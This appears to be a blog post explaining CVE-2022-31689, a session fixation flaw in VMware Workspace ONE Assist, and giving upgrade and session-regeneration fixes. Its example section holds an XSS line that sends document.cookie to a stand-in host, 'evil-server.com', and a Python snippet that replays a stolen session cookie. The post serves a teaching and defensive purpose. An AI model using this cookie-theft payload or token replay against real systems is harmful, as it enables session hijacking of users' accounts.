CVE-2022-31689 - Understanding and Exploiting a Session Fixation Vulnerability in VMware Workspace ONE Assist

*Posted June 2024*


Summary:  
CVE-2022-31689 is a session fixation vulnerability in VMware Workspace ONE Assist (before version 22.10). This weakness lets attackers hijack user sessions by reusing valid session tokens. If an attacker gets a session token (maybe via phishing or malware), they can use it to access the application as if they were the actual user.

What is Session Fixation?

Session fixation happens when an attacker tricks a user or system into using a known session identifier (session_id). Since the session token is valid and known to the attacker, they can impersonate the user.

Where Does the Problem Occur?

Workspace ONE Assist used session tokens to validate users. These tokens weren’t always invalidated or recreated upon login. If an attacker managed to get a hold of a session token, they could use it to log in, even after the original user finished logging in.

VMware Advisory:  
VMware CVE-2022-31689 Advisory

Let’s walk through a simple exploitation scenario in plain steps

1. Steal a Token: Attacker gets a user’s session token, maybe from browser cookies, XSS, or phishing.
2. Access the Application: The attacker sends requests to Workspace ONE Assist using the stolen token.
3. Act as the User: Since the token is already valid, the attacker gets user access without needing the password.

Example code: Stealing and Using the Session Token

Assume the session token is passed as a cookie named ASSIST_SESSIONID.

A malicious script could look like this (for XSS)

// Malicious JS injected via XSS
fetch('https://evil-server.com/steal?cookie='; + document.cookie);

This sends all cookies, including ASSIST_SESSIONID, to the attacker.

Now, the attacker adds the stolen cookie to their own browser or HTTP request tool

import requests

# The stolen session cookie
cookies = {'ASSIST_SESSIONID': 'stolen-session-token'}

response = requests.get('https://victim-workspace-one-assist.com/user/dashboard';, cookies=cookies)

print(response.text)

Just like that, the attacker accesses the victim’s dashboard.

Why Does Session Fixation Work Here?

The vulnerability is that session tokens stay valid after login, and Workspace ONE Assist didn’t always generate a new session token after authentication. This allows session reuse by an attacker. Ideally, after login, the application should generate a new session token, invalidating any previous one.

Exploit Considerations

- This attack requires *obtaining* a valid user’s session token, which typically needs another vulnerability (XSS, Man-in-the-Middle, malware, etc.).
- After getting the token, the attacker needs to access the application before the victim logs out or the token expires.

Mitigation and Fix

VMware’s fix:  
Upgrade to Workspace ONE Assist version 22.10 or newer.  
This ensures new session tokens are generated after login, and old sessions become invalid.

Fixes for developers

- Regenerate session IDs on every login/authentication event.

Key References

- VMware Security Advisory: VMSA-2022-0025
- OWASP Session Fixation Cheat Sheet
- VMware Workspace ONE Assist Documentation: Official Docs

Final Thoughts

CVE-2022-31689 is an important reminder: session management must always renew tokens on login and invalidate old ones. Even top enterprise tools can have simple, yet dangerous bugs. Update your systems, review your session management, and don't let attackers ride on stale tokens!

If you’re running Workspace ONE Assist below 22.10, update now. Stay vigilant!

Timeline

Published on: 11/09/2022 21:15:00 UTC
Last modified on: 11/10/2022 19:53:00 UTC